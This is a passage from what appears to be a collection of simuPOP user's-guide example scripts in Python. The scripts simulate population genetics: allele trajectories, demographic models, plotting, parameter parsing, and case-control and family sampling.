initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.8, 0.2], subPops=0),\n sim.InitGenotype(freq=[0.7, 0.3], subPops=1),\n sim.PyOutput('Sp0: loc2\\tloc5\\tSp1: loc2\\tloc5\\n'),\n ],\n matingScheme=sim.ControlledRandomMating(\n ops=[sim.Recombinator(rates=0.01)],\n loci=5, alleles=1, freqFunc=traj.func()),\n postOps=[\n sim.Stat(alleleFreq=[2, 5], vars=['alleleFreq_sp'], step=20),\n sim.PyEval(r"'%.2f\\t%.2f\\t%.2f\\t%.2f\\n' % (subPop[0]['alleleFreq'][2][1],"\n "subPop[0]['alleleFreq'][5][1], subPop[1]['alleleFreq'][2][1],"\n "subPop[1]['alleleFreq'][5][1])", step=20)\n ],\n gen = 101\n)\n#end_file\n\n#begin_file log/backTrajectory.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import Trajectory, simulateBackwardTrajectory\nfrom math import exp\ndef Nt(gen):\n 'An exponential population growth demographic model.'\n return int((5000) * exp(.00115 * gen))\n\ndef fitness(gen, sp):\n 'Constant positive selection pressure.'\n return [1, 1.01, 1.02]\n\n# simulate a trajectory backward in time, from generation 1000\ntraj = simulateBackwardTrajectory(N=Nt, fitness=fitness, nLoci=2,\n endGen=1000, endFreq=[0.1, 0.2])\n# matplotlib syntax\n#traj.plot('log/backTrajectory.png', set_ylim_top=0.3, set_ylim_bottom=0,\n# plot_c_loc=['r', 'b'], set_title_label='Simulated Trajectory (backward-time)')\n\nprint('Trajectory simulated with length %s ' % len(traj.traj))\npop = sim.Population(size=Nt(0), loci=[1]*2)\n# save the Trajectory function in the population's local namespace\n# so that the sim.PyEval operator can access it.\npop.dvars().traj = traj.func()\npop.evolve(\n initOps=[sim.InitSex()],\n preOps=traj.mutators(loci=[0, 1]),\n matingScheme=sim.ControlledRandomMating(loci=[0, 1], alleles=[1, 1],\n subPopSize=Nt, freqFunc=traj.func()),\n postOps=[\n sim.Stat(alleleFreq=[0, 1], begin=500, step=100),\n sim.PyEval(r"'%4d: %.3f (exp: %.3f), %.3f (exp: %.3f)\\n' % (gen, alleleFreq[0][1],"\n "traj(gen)[0], alleleFreq[1][1], traj(gen)[1])",\n begin=500, step=100)\n ],\n gen=1001 # evolve 1001 generations to reach the end of generation 1000\n)\n#end_file\n\n\n#begin_file log/ProgressBar.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import ProgressBar\npop = sim.Population(10000, loci=[10], infoFields='index')\nprog = ProgressBar('Setting individual genotype...\\n', pop.popSize(), gui=False)\nfor idx in range(pop.popSize()):\n # do something to each individual\n pop.individual(idx).index = idx\n # idx + 1 can be 
ignored in this case.\n prog.update(idx + 1)\n\n#end_file\n\n\n#begin_file log/viewVars.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True, gui=False)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import viewVars\npop = sim.Population([1000, 2000], loci=3)\nsim.initGenotype(pop, freq=[0.2, 0.4, 0.4], loci=0)\nsim.initGenotype(pop, freq=[0.2, 0.8], loci=2)\nsim.stat(pop, genoFreq=[0, 1, 2], haploFreq=[0, 1, 2],\n alleleFreq=range(3),\n vars=['genoFreq', 'genoNum', 'haploFreq', 'alleleNum_sp'])\nviewVars(pop.vars())\n#end_file\n\n\n#begin_file log/saveCSV.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True, gui=False)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import saveCSV\npop = sim.Population(size=[10], loci=[2, 3],\n lociNames=['r11', 'r12', 'r21', 'r22', 'r23'],\n alleleNames=['A', 'B'], infoFields='age')\nsim.initSex(pop)\nsim.initInfo(pop, [2, 3, 4], infoFields='age')\nsim.initGenotype(pop, freq=[0.4, 0.6])\nsim.maPenetrance(pop, loci=0, penetrance=(0.2, 0.2, 0.4))\n# no filename so output to standard output\nsaveCSV(pop, infoFields='age')\n# change affection code and how to output genotype\nsaveCSV(pop, infoFields='age', affectionFormatter={True: 1, False: 2},\n genoFormatter={(0,0):'AA', (0,1):'AB', (1,0):'AB', (1,1):'BB'})\n# save to a file\nsaveCSV(pop, filename='pop.csv', infoFields='age', affectionFormatter={True: 1, False: 2},\n genoFormatter=lambda geno: (geno[0] + 1, geno[1] + 1), sep=' ')\nprint(open('pop.csv').read())\n#begin_ignore\nimport os\nos.remove('pop.csv')\n#end_ignore\n#end_file\n\n\n\n#begin_file log/demoModel.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.demography import *\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nmodel = MultiStageModel([\n InstantChangeModel(T=200, \n # start with an ancestral population of size 1000\n N0=(1000, 'Ancestral'),\n # change population size at 50 and 60\n G=[50, 60], \n # change to population size 200 and back to 1000\n NG=[(200, 'bottleneck'), (1000, 'Post-Bottleneck')]),\n ExponentialGrowthModel(\n T=50, \n # split the population into two subpopulations\n N0=[(400, 'P1'), (600, 'P2')],\n # expand to size 4000 and 5000 respectively\n NT=[4000, 5000])]\n )\n#\n# model.init_size returns the initial population size\n# migrate_to is required for 
migration\npop = sim.Population(size=model.init_size, loci=1,\n infoFields=model.info_fields)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(subPopSize=model),\n finalOps=\n sim.Stat(alleleFreq=0, vars=['alleleFreq_sp']),\n gen=model.num_gens\n)\n# print out population size and frequency\nfor idx, name in enumerate(pop.subPopNames()):\n print('%s (%d): %.4f' % (name, pop.subPopSize(name), \n pop.dvars(idx).alleleFreq[0][0]))\n\n# get a visual presentation of the demographic model\nmodel.plot('log/demoModel.png',\n title='A bottleneck + exponential growth demographic model')\n#begin_ignore\nMultiStageModel([\n LinearGrowthModel(T=100, N0=1000, r=0.01), \n ExponentialGrowthModel(T=100, N0=[0.4, 0.6], r=0.001),\n ExponentialGrowthModel(r=0.01, NT=[2000, 4000]),\n AdmixtureModel(model=('HI', 0, 1, 0.8, 'admixed'), T=10)\n]).plot('log/MultiStage.png')\nOutOfAfricaModel(10000).plot('log/OutOfAfrica.png')\n#OutOfAfricaModel(10000, scale=10).plot('log/ScaledOutOfAfrica.png')\nSettlementOfNewWorldModel(10000).plot('log/SettlementOfNewWorld.png')\n#SettlementOfNewWorldModel(10000, scale=10).plot('log/ScaledSettlementOfNewWorld.png')\nCosiModel(20000).plot('log/Cosi.png')\n#CosiModel(20000, scale=10).plot('log/ScaledCosi.png')\n#end_ignore\n#end_file\n\n\n\n\n#begin_file log/demoEventModel.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.demography import *\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport math\nmodel = EventBasedModel(\n N0=(1000, 'Ancestral'),\n T=250,\n events=[\n ResizeEvent(at=50, sizes=200),\n ResizeEvent(at=60, sizes=1000),\n SplitEvent(sizes=[0.4, 0.6], names=['P1', 'P2'], at=200),\n ExpansionEvent(rates=[math.log(4000/400)/50, math.log(5000/600)/50], begin=200)\n ]\n)\n#\n# model.init_size returns the initial population size\n# migrate_to is required for migration\npop = sim.Population(size=model.init_size, loci=1,\n infoFields=model.info_fields)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(subPopSize=model),\n finalOps=\n sim.Stat(alleleFreq=0, vars=['alleleFreq_sp']),\n gen=model.num_gens\n)\n# print out population size and frequency\nfor idx, name in enumerate(pop.subPopNames()):\n print('%s (%d): %.4f' % (name, pop.subPopSize(name), \n pop.dvars(idx).alleleFreq[0][0]))\n\n# get a visual presentation of the demographic model\nmodel.plot('log/demoEventModel.png',\n title='A event-based bottleneck + exponential growth demographic model')\n\n#end_file\n\n#begin_file log/demoTerminate.py\n#begin_ignore\nimport simuOpt\n#end_ignore\nimport simuPOP as sim\nimport simuPOP.demography as demo\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\nmodel = demo.MultiStageModel([\n demo.InstantChangeModel(N0=1000, \n ops=[\n sim.Stat(alleleFreq=sim.ALL_AVAIL, numOfSegSites=sim.ALL_AVAIL),\n # terminate if the average allele frequency of segregating sites\n # are more than 0.1 \n sim.TerminateIf('sum([x[1] for x in alleleFreq.values() if '\n 'x[1] != 0])/(1 if numOfSegSites==0 else numOfSegSites) > 0.1')\n ]\n ),\n demo.ExponentialGrowthModel(N0=[0.5, 0.5], r=0.01, NT=[2000, 5000])\n ]\n)\n\npop = sim.Population(size=model.init_size, loci=100)\npop.evolve(\n initOps=sim.InitSex(),\n preOps=sim.SNPMutator(u=0.001, v=0.001),\n matingScheme=sim.RandomMating(subPopSize=model),\n postOps=[\n sim.Stat(alleleFreq=sim.ALL_AVAIL, numOfSegSites=sim.ALL_AVAIL,\n popSize=True, 
step=50),\n sim.PyEval(r'"%d: %s, %.3f\\n" % (gen, subPopSize, sum([x[1] for x '\n 'in alleleFreq.values() if x[1] != 0])/(1 if numOfSegSites == 0 '\n 'else numOfSegSites))', step=50)\n ],\n)\n\n#end_file\n\n\n\n#begin_file log/varPlotByRep.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.plotter import VarPlotter\npop = sim.Population(size=1000, loci=1*4)\nsimu = sim.Simulator(pop, rep=3)\nsimu.evolve(\n initOps=[sim.InitSex()] +\n [sim.InitGenotype(freq=[0.1*(x+1), 1-0.1*(x+1)], loci=x) for x in range(4)],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=range(4)),\n VarPlotter('[alleleFreq[x][0] for x in range(4)]', byRep=True,\n update=10, saveAs='log/varplot_byRep.png',\n figure_figsize=(10, 8),\n legend=['Locus %d' % x for x in range(4)],\n set_ylabel_ylabel='Allele frequency',\n set_ylim_bottom=0, set_ylim_top=1,\n set_title_label_rep=['Genetic drift, replicate %d' % x for x in range(3)],\n ),\n ],\n gen=100\n)\n#end_file\n\n#begin_file log/varPlotter.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.plotter import VarPlotter\npop = sim.Population(size=1000, loci=2)\nsimu = sim.Simulator(pop, rep=3)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 2, 2, 1])\n ],\n matingScheme=sim.RandomMating(ops=sim.Recombinator(rates=0.01)),\n postOps=[\n sim.Stat(LD=[0, 1]),\n # \n VarPlotter('LD[0][1]', step=5, update=40, saveAs='log/varplot.png',\n legend=['Replicate %d' % x for x in range(3)],\n set_ylabel_ylabel='LD between marker 1 and 2',\n set_title_label='LD decay',\n set_ylim_bottom=0, set_ylim_top=0.25,\n plot_linestyle_rep=['-', ':', '-.'],\n ),\n ],\n gen=100\n)\n#end_file\n\n#begin_file log/varPlotByDim.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.plotter import VarPlotter\npop = sim.Population(size=1000, loci=1*4)\nsimu = sim.Simulator(pop, rep=3)\ndef rpy_drawFrame(r, dim=None, **kwargs):\n '''Draw a frame around subplot dim. Parameter r is defined in the rpy\n module and is used for calling R functions. Parameter dim is the dimension\n index. Other parameters are ignored.\n '''\n r.axis(1)\n r.axis(2)\n r.grid()\n r.mtext({0:'A', 1:'B', 2:'C', 3:'D'}[dim], adj=1)\n\ndef mat_drawFrame(ax, dim=None, **kwargs):\n '''Draw a frame around subplot dim. Parameter ax is a matplotlib axes\n object used for drawing. Parameter dim is the dimension\n index. 
Other parameters are ignored.\n '''\n ax.grid()\n ax.text(0.5, 0.8, {0:'A', 1:'B', 2:'C', 3:'D'}[dim])\n\nsimu.evolve(\n initOps=[sim.InitSex()]+\n [sim.InitGenotype(freq=[0.1*(x+1), 1-0.1*(x+1)], loci=x) for x in range(4)],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=range(4)),\n VarPlotter('[alleleFreq[x][0] for x in range(4)]', byDim=True,\n update=10, saveAs='log/varplot_byDim.png',\n legend=['Replicate %d' % x for x in range(3)],\n set_ylabel_ylabel='Allele frequency',\n set_ylim_bottom=0, set_ylim_top=1,\n set_title_label_dim=['Genetic drift, freq=%.1f' % ((x+1)*0.10) for x in range(4)],\n plot_c_rep=['red', 'blue', 'black'],\n plot_linestyle_rep=['-', '-.', ':'],\n figure_figsize=(10,8),\n plotHook = mat_drawFrame,\n ),\n ],\n gen=100\n)\n#end_file\n\n#begin_file log/ScatterPlotter.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.plotter import ScatterPlotter\nimport random\npop = sim.Population([500], infoFields=['x', 'y', 'anc'])\n# Defines VSP 0, 1, 2, 3, 4 by anc.\npop.setVirtualSplitter(sim.InfoSplitter('anc', cutoff=[0.2, 0.4, 0.6, 0.8]))\n#\ndef passInfo(x, y, anc):\n 'Parental fields will be passed as tuples'\n off_anc = (anc[0] + anc[1])/2.\n off_x = (x[0] + x[1])/2 + random.normalvariate(off_anc - 0.5, 0.1)\n off_y = (y[0] + y[1])/2 + random.normalvariate(0, 0.1)\n return off_x, off_y, off_anc\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n # random geographic location\n sim.InitInfo(random.random, infoFields=['x', 'y']),\n # anc is 0 or 1\n sim.InitInfo(lambda : random.randint(0, 1), infoFields='anc')\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.PyTagger(passInfo)]),\n postOps=[\n ScatterPlotter(['x', 'y'], \n saveAs = 'log/ScatterPlotter.png',\n subPops = [(0, 0), (0, 1), (0, 2), (0, 3), (0, 4)],\n set_ylim_bottom = 0, set_ylim_top=1.2,\n set_title_label = \"!'Ancestry distribution of individuals at generation %d' % gen\",\n legend = ['anc < 0.2', '0.2 <= anc < 0.4', '0.4 <= anc < 0.6',\n '0.6 <= anc < 0.8', '0.8 <= anc'],\n ),\n\n ],\n gen = 5,\n)\n#end_file\n\n\n#begin_file log/getParam.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport types, simuOpt\noptions = [\n {'name': 'rate',\n 'default': [0.01],\n 'label': 'Recombination rate',\n 'type': 'numbers',\n 'description': '''Recombination rate for each replicate. If a single value\n is given, it will be used for all replicates.''',\n 'validator': simuOpt.valueListOf(simuOpt.valueBetween(0, 1))\n },\n {'name': 'rep',\n 'default': 5,\n 'label': 'Number of replicates',\n 'type': 'number',\n 'description': 'Number of replicates to simulate.',\n 'validator': simuOpt.valueGT(0)\n }, \n {'name': 'pop',\n 'default': 'CEU',\n 'label': 'Initial population',\n 'type': ('chooseOneOf', ['CEU', 'YRI', 'CHB+JPT']),\n 'description': '''Use one of the HapMap sim.populations as the initial\n sim.Population for this simulation. 
You can choose from:\n |YRI: 33 trios from the Yoruba people in Nigeria (Africa)\n |CEU: 30 trios from Utah with European ancestry (European)\n |CHB+JPT: 90 unrelated individuals from China and Japan (Asia)\n ''',\n }\n]\npars = simuOpt.Params(options, 'A demo simulation')\nprint(pars.usage())\n# You can manually feed parameters...\npars.processArgs(['--rep=10'])\npars.rep\n#begin_ignore\nimport sys\noldArg = [x for x in sys.argv]\nsys.argv.pop()\nimport os\nif not os.path.isfile('figures/getParam.png'):\n print('Run a GUI if getParam has not been runned')\nelse:\n sys.argv = ['getParam.py', '--rate=[0.25]', '--rep=5', '--pop=\"CEU\"']\n simuOpt.setOptions(gui=False)\n\nimport simuPOP as sim\npars.processArgs(sys.argv)\n#end_ignore\nif not pars.getParam():\n sys.exit(1)\n\n#begin_ignore\nsys.argv = oldArg\n#end_ignore\npars.saveConfig('sample.cfg')\n# post-process parameters\npars.rate\npars.rep\npars.rate = pars.rate * pars.rep\n# extract parameters as a dictionary or a list\npars.asDict()\npars.asList()\n# Default value of parameter rep is changed\n# additional attribute is added.\npar1 = simuOpt.Params(options, # all parameters with default values\n rep=50, # default value of rep is changed\n additional=10 # derived parameters are added\n)\n# print all parameters except for derived ones.\nprint(par1.asDict())\n# All parameters are derived ...\npar2 = simuOpt.Params(rep=50, pop='CEU', rate=[0.5])\nprint(par2.asDict())\nprint(par2.rep, par2.pop)\n#end_file\n\n#begin_file log/paramFunc.py\nimport types, simuOpt\npars = simuOpt.Params(doc='A demo simulation')\npars.addOption('rate', [0.01], label = 'Recombination rate',\n type = 'numbers', description = '''Recombination rate for each replicate.\n If a single value is given, it will be used for all replicates.''')\npars.addOption('rep', 5, label = 'Number of replicates', type = 'integer',\n description = 'Number of replicates to simulate.',\n validator = simuOpt.valueGT(0)) \npars.addOption('pop', 'CEU', label = 'Initial population',\n type = ('chooseOneOf', ['CEU', 'YRI', 'CHB+JPT']),\n description = '''Use one of the HapMap sim.populations as the initial\n sim.Population for this simulation. 
You can choose from:\n |YRI: 33 trios from the Yoruba people in Nigeria (Africa)\n |CEU: 30 trios from Utah with European ancestry (European)\n |CHB+JPT: 90 unrelated individuals from China and Japan (Asia)\n ''')\nprint(pars.usage())\n#end_file\n\n\n#begin_file log/randomSample.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.sampling import drawRandomSample\npop = sim.Population([2000]*5, loci=1)\n# sample from the whole population\nsample = drawRandomSample(pop, sizes=500)\nprint(sample.subPopSizes())\n# sample from each subpopulation\nsample = drawRandomSample(pop, sizes=[100]*5)\nprint(sample.subPopSizes())\n#end_file\n\n\n#begin_file log/caseControlSample.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.sampling import drawCaseControlSamples\npop = sim.Population([10000], loci=5)\nsim.initGenotype(pop, freq=[0.2, 0.8])\nsim.maPenetrance(pop, loci=2, penetrance=[0.11, 0.15, 0.20])\n# draw multiple case control sample\nsamples = drawCaseControlSamples(pop, cases=500, controls=500, numOfSamples=5)\nfor sample in samples:\n sim.stat(sample, association=range(5))\n print(', '.join(['%.6f' % sample.dvars().Allele_ChiSq_p[x] for x in range(5)]))\n\n#end_file\n\n\n#begin_file log/sampleAffectedSibpair.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12347)\n#end_ignore\nfrom simuPOP.sampling import indexToID\npop = sim.Population(size=15, loci=5, infoFields=['father_idx', 'mother_idx'], ancGen=2)\npop.evolve(\n preOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.7, 0.3]),\n ],\n matingScheme=sim.RandomMating(numOffspring=(sim.UNIFORM_DISTRIBUTION, 2, 4),\n ops=[sim.MendelianGenoTransmitter(), sim.ParentsTagger()]),\n postOps=sim.MaPenetrance(loci=3, penetrance=(0.1, 0.4, 0.7)),\n gen = 5\n)\nindexToID(pop, reset=True)\n# three information fields were added\nprint(pop.infoFields())\n# save this population for future use\npop.save('log/pedigree.pop')\n\nfrom simuPOP.sampling import drawAffectedSibpairSample\npop = sim.loadPopulation('log/pedigree.pop')\nsample = drawAffectedSibpairSample(pop, families=2)\n#end_file\n\n\n#begin_file log/sampleNuclearFamily.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12347)\n#end_ignore\nfrom simuPOP.sampling import drawNuclearFamilySample\npop = sim.loadPopulation('log/pedigree.pop')\nsample = drawNuclearFamilySample(pop, families=2, numOffspring=(2,4),\n affectedParents=(1,2), affectedOffspring=(1, 3))\n# try to separate two families?\nsample.asPedigree()\n#= sim.Pedigree(sample, loci=sim.ALL_AVAIL, infoFields=sim.ALL_AVAIL)\nsample.addInfoFields('ped_id')\n# return size of families\nsz = sample.identifyFamilies(pedField='ped_id')\nprint(sz)\nped1 = sample.extractIndividuals(IDs=0, idField='ped_id')\n# print the ID of all individuals in the first pedigree\nprint([ind.ind_id for ind in ped1.allIndividuals()])\n#end_file\n\n\n\n#begin_file log/sampleThreeGenFamily.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12347)\n#end_ignore\nfrom simuPOP.sampling import drawThreeGenFamilySample\npop = sim.loadPopulation('log/pedigree.pop')\nsample = drawThreeGenFamilySample(pop, 
families=2, numOffspring=(1, 3),\n    pedSize=(8, 15), numOfAffected=(2, 5))\n#end_file\n\n\n#begin_file log/combinedSampling.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12347)\n#end_ignore\nfrom simuPOP.sampling import drawCombinedSample, AffectedSibpairSampler, NuclearFamilySampler\npop = sim.loadPopulation('log/pedigree.pop')\nsample = drawCombinedSample(pop, samplers = [\n    AffectedSibpairSampler(families=1),\n    NuclearFamilySampler(families=1, numOffspring=(2,4), affectedParents=(1,2), affectedOffspring=(1,3))\n    ])\n#end_file\n\n\n#begin_file log/samplingVSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# create an age-structured population with a disease\nimport random\npop = sim.Population(10000, loci=10, infoFields='age')\nsim.initGenotype(pop, freq=[0.3, 0.7])\nsim.initInfo(pop, lambda: random.randint(0, 70), infoFields='age')\npop.setVirtualSplitter(sim.InfoSplitter(cutoff=(40, 60), field='age'))\nsim.maPenetrance(pop, loci=5, penetrance=(0.1, 0.2, 0.3))\n#\nfrom simuPOP.sampling import drawCaseControlSample\nsample = drawCaseControlSample(pop, cases=500, controls=500, subPops=[(0,1)])\nageInSample = sample.indInfo('age')\nprint(min(ageInSample), max(ageInSample))\n#end_file\n\n#begin_file log/samplingSeparateVSPs.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# create an age-structured population with a disease\nimport random\npop = sim.Population(10000, loci=10, infoFields='age')\nsim.initGenotype(pop, freq=[0.3, 0.7])\nsim.initInfo(pop, lambda: random.randint(0, 70), infoFields='age')\npop.setVirtualSplitter(sim.InfoSplitter(cutoff=(20, 40), field='age'))\n# different age groups have different penetrance\nsim.maPenetrance(pop, loci=5, penetrance=(0.1, 0.2, 0.3), subPops=[(0,1)])\nsim.maPenetrance(pop, loci=5, penetrance=(0.2, 0.4, 0.6), subPops=[(0,2)])\n# count the number of affected individuals in each group\nsim.stat(pop, numOfAffected=True, subPops=[(0,1), (0,2)], vars='numOfAffected_sp')\nprint(pop.dvars((0,1)).numOfAffected, pop.dvars((0,2)).numOfAffected)\n#\nfrom simuPOP.sampling import drawRandomSample\nsample = drawRandomSample(pop, sizes=[500, 500], subPops=[(0,1), (0,2)])\n# virtual subpopulations are rearranged to different subpopulations.\nprint(sample.subPopSizes())\n#end_file\n\n\n#begin_file log/reichDemo.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport math\ndef demo_model(model, N0=1000, N1=100000, G0=500, G1=500):\n    '''Return a demographic function \n    model: 'instant' or 'exponential'\n    N0:   Initial sim.population size.\n    N1:   Ending sim.population size.\n    G0:   Length of burn-in stage.\n    G1:   Length of sim.population expansion stage.\n    '''\n    def ins_expansion(gen):\n        if gen < G0:\n            return N0\n        else:\n            return N1\n    rate = (math.log(N1) - math.log(N0))/G1\n    def exp_expansion(gen):\n        if gen < G0:\n            return N0\n        else: \n            return int(N0 * math.exp((gen - G0) * rate))\n    if model == 'instant':\n        return ins_expansion\n    elif model == 'exponential':\n        return exp_expansion\n\n# when needed, create a demographic function as follows\ndemo_func = demo_model('exponential', 1000, 100000, 500, 500)\n# sim.population size at generation 
700\nprint(demo_func(700))\n#end_file\n\n#begin_file log/reichstat.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nclass ne(sim.PyOperator):\n    '''Define an operator that calculates effective number of\n    alleles at given loci. The result is saved in a population\n    variable ne.\n    '''\n    def __init__(self, loci, *args, **kwargs):\n        self.loci = loci\n        sim.PyOperator.__init__(self, func=self.calcNe, *args, **kwargs)\n    #\n    def calcNe(self, pop):\n        sim.stat(pop, alleleFreq=self.loci)\n        ne = {}\n        for loc in self.loci:\n            freq = pop.dvars().alleleFreq[loc]\n            sumFreq = 1 - pop.dvars().alleleFreq[loc][0]\n            if sumFreq == 0:\n                ne[loc] = 0\n            else:\n                ne[loc] = 1. / sum([(freq[x]/sumFreq)**2 for x in list(freq.keys()) if x != 0])\n        # save the result to the sim.Population.\n        pop.dvars().ne = ne\n        return True\n\ndef Ne(pop, loci):\n    '''Function form of operator ne'''\n    ne(loci).apply(pop)\n    return pop.dvars().ne\n\npop = sim.Population(100, loci=[10])\nsim.initGenotype(pop, freq=[.2] * 5)\nprint(Ne(pop, loci=[2, 4]))\n#end_file\n\n#begin_file log/reichEvolve.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\n#begin_ignore\nimport math\ndef demo_model(model, N0=1000, N1=100000, G0=500, G1=500):\n    '''Return a demographic function \n    model: 'instant' or 'exponential'\n    N0:   Initial sim.population size.\n    N1:   Ending sim.population size.\n    G0:   Length of burn-in stage.\n    G1:   Length of sim.population expansion stage.\n    '''\n    rate = (math.log(N1) - math.log(N0))/G1\n    def ins_expansion(gen):\n        if gen < G0:\n            return N0\n        else:\n            return N1\n    \n    def exp_expansion(gen):\n        if gen < G0:\n            return N0\n        else: \n            return int(N0 * math.exp((gen - G0) * rate))\n    \n    if model == 'instant':\n        return ins_expansion\n    elif model == 'exponential':\n        return exp_expansion\n\nclass ne(sim.PyOperator):\n    '''Define an operator that calculates effective number of\n    alleles at given loci. The result is saved in a population\n    variable ne.\n    '''\n    def __init__(self, loci, *args, **kwargs):\n        self.loci = loci\n        sim.PyOperator.__init__(self, func=self.calcNe, *args, **kwargs)\n    \n    def calcNe(self, pop):\n        sim.stat(pop, alleleFreq=self.loci)\n        ne = {}\n        for loc in self.loci:\n            freq = pop.dvars().alleleFreq[loc]\n            sumFreq = 1 - pop.dvars().alleleFreq[loc][0]\n            if sumFreq == 0:\n                ne[loc] = 0\n            else:\n                ne[loc] = 1. 
/ sum([(freq[x]/sumFreq)**2 for x in list(freq.keys()) if x != 0])\n        # save the result to the sim.Population.\n        pop.dvars().ne = ne\n        return True\n\n#end_ignore\n\ndef simulate(model, N0, N1, G0, G1, spec, s, mu, k):\n    '''Evolve a sim.Population using given demographic model\n    and observe the evolution of its allelic spectrum.\n    model: type of demographic model.\n    N0, N1, G0, G1: parameters of demographic model.\n    spec: initial allelic spectrum, should be a list of allele\n        frequencies for each allele.\n    s: selection pressure.\n    mu: mutation rate.\n    k: k for the k-allele model\n    '''\n    demo_func = demo_model(model, N0, N1, G0, G1)\n    pop = sim.Population(size=demo_func(0), loci=1, infoFields='fitness')\n    pop.evolve(\n        initOps=[\n            sim.InitSex(),\n            sim.InitGenotype(freq=spec, loci=0)\n        ],\n        matingScheme=sim.RandomMating(subPopSize=demo_func),\n        postOps=[\n            sim.KAlleleMutator(k=k, rates=mu),\n            sim.MaSelector(loci=0, fitness=[1, 1, 1 - s], wildtype=0),\n            ne(loci=[0], step=100),\n            sim.PyEval(r'\"%d: %.2f\\t%.2f\\n\" % (gen, 1 - alleleFreq[0][0], ne[0])',\n                step=100),\n        ],\n        gen = G0 + G1\n    )\n\nsimulate('instant', 1000, 10000, 500, 500, [0.9]+[0.02]*5, 0.01, 1e-4, 200)\n#end_file\n\n#begin_file log/simuCDCV.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\n#!/usr/bin/env python\n#\n# Author:  Bo Peng\n# Purpose: A real world example for simuPOP user's guide.\n#\n'''\nSimulate the evolution of allelic spectra (number and frequencies\nof alleles at a locus), under the influence of sim.population expansion,\nmutation, and natural selection.\n'''\nimport 